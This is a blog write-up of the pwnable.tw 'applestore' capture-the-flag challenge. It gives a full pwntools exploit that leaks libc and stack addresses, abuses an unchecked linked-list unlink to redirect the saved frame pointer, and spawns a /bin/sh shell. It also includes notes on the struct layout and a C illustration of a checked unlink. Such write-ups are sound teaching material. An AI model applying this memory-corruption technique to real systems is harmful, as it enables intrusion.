[pwnable.tw] applestore
Gyeongje
2018. 8. 3. 20:23
```python
from pwn import *

def add(n):
    # Menu 2: add item number n to the cart
    r.sendlineafter(b"> ", b"2")
    r.sendlineafter(b"Number> ", str(n).encode())

r = remote('chall.pwnable.tw', 10104)
#r = process("./applestore")
e = ELF("./applestore")
#libc = ELF("/lib/i386-linux-gnu/libc.so.6")
libc = ELF("./libc_32.so.6")

# Fill the cart with 6 x item 1 and 20 x item 2, then check out (menu 5)
for i in range(6):
    add(1)
for i in range(20):
    add(2)

r.sendlineafter(b"> ", b"5")
r.sendlineafter(b"(y/n) > ", b"y")

# Menu 4 (cart): the bytes after 'y\x00' land in the 27th node's name field,
# so listing the cart prints the 4 bytes at the address we supply (GOT of atoi)
r.sendlineafter(b"> ", b"4")
r.sendlineafter(b"(y/n) > ", b"y\x00" + p32(e.got["atoi"]) + b"\x00" * 8)
r.recvuntil(b"27: ")
atoi = u32(r.recv(4))
base = atoi - libc.symbols["atoi"]
environ = base + libc.symbols["environ"]
system = base + libc.symbols["system"]
binsh = base + next(libc.search(b"/bin/sh"))
log.info("atoi : " + hex(atoi))
log.info("base : " + hex(base))
log.info("environ : " + hex(environ))
log.info("system : " + hex(system))
log.info("binsh : " + hex(binsh))

# Same leak again, this time reading libc's environ to get a stack address
r.sendlineafter(b"> ", b"4")
r.sendlineafter(b"(y/n) > ", b"y\x00" + p32(environ) + b"\x00" * 8)
r.recvuntil(b"27: ")
environ_addr = u32(r.recv(4))
log.info("environ_addr : " + hex(environ_addr))

stack = environ_addr - 0xe4   # handler [ebp-0x20]
ebp = environ_addr - 0xc4     # handler sfp
log.info('handler_Stack : ' + hex(stack))
log.info('handler_EBP : ' + hex(ebp))

# Menu 3 (delete) on node 27: after the index, the fields name / price / next / prev
# of the fake node follow; unlink then does (prev+8)=next and (next+0xc)=prev
r.recvuntil(b"> ")
r.sendline(b"3")
r.recvuntil(b"> ")
r.sendline(b"27" + p32(atoi) + b"AAAA" + p32(stack) + p32(ebp - 0x8))
# Menu 6 (exit) with the rest of the input buffer shaped as the frame
# that is used after the saved ebp has been redirected: system("/bin/sh")
r.recvuntil(b"> ")
r.sendline(b"06" + b"AAAA" + p32(system) + b"AAAA" + p32(binsh))
r.interactive()
```
1. %s item name == +0
2. %d price == +4
3. address of the next item == +8
4. address of the previous item == +0xc
How delete works {"next" and "previous" are relative to the current item}
(previous item address + 8) = (next item address)
(next item address + 0xc) = (previous item address)
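Added example in C (not code from the write-up or the challenge binary): the item layout and the two unlink writes from the notes above, next to a checked variant that refuses a node whose neighbours do not point back at it; the item names, prices and the two "victim" structs are constructed for the simulation.

```c
#include <stddef.h>

/* Item layout as recovered in the notes (32-bit build: name +0, price +4,
 * next +8, prev +0xc). The unlink writes depend only on this field order. */
struct item {
    char *name;
    int price;
    struct item *next;
    struct item *prev;
};

/* The two writes delete() performs, exactly as the notes state:
 * (prev + 8) = next and (next + 0xc) = prev, with no validation at all. */
void unlink_unchecked(struct item *cur)
{
    struct item *nx = cur->next, *pv = cur->prev;
    if (pv) pv->next = nx;
    if (nx) nx->prev = pv;
}

/* Hardened variant (an assumption for this example, not the challenge's code): both
 * neighbours must point back at the node before anything is written, the same
 * "corrupted double-linked list" check glibc makes. Returns 0 on success, -1 on refusal. */
int unlink_checked(struct item *cur)
{
    struct item *nx = cur->next, *pv = cur->prev;
    if ((pv && pv->next != cur) || (nx && nx->prev != cur))
        return -1;
    if (pv) pv->next = nx;
    if (nx) nx->prev = pv;
    return 0;
}

/* Simulation with constructed items: cart a<->b<->c, an honest delete of c, then b's
 * next/prev replaced by two unrelated "victim" structs (a forged node). Bitmask result:
 * 1 = honest delete passed the check, 2 = forged node refused and victims untouched,
 * 4 = unchecked unlink wrote into both victims; all three together give 7. */
int simulate_forged_delete(void)
{
    struct item a = {"item-a", 1, NULL, NULL}, b = {"item-b", 2, NULL, NULL};
    struct item c = {"item-c", 3, NULL, NULL};
    struct item v1 = {"victim1", 0, NULL, NULL}, v2 = {"victim2", 0, NULL, NULL};
    int result = 0;
    a.next = &b; b.prev = &a; b.next = &c; c.prev = &b;        /* well-formed cart */
    if (unlink_checked(&c) == 0 && b.next == NULL) result |= 1;
    b.next = &v1; b.prev = &v2;                                  /* forged links */
    if (unlink_checked(&b) == -1 && v2.next == NULL && v1.prev == NULL) result |= 2;
    unlink_unchecked(&b);
    if (v2.next == &v1 && v1.prev == &v2) result |= 4;          /* both writes landed */
    return result;
}
```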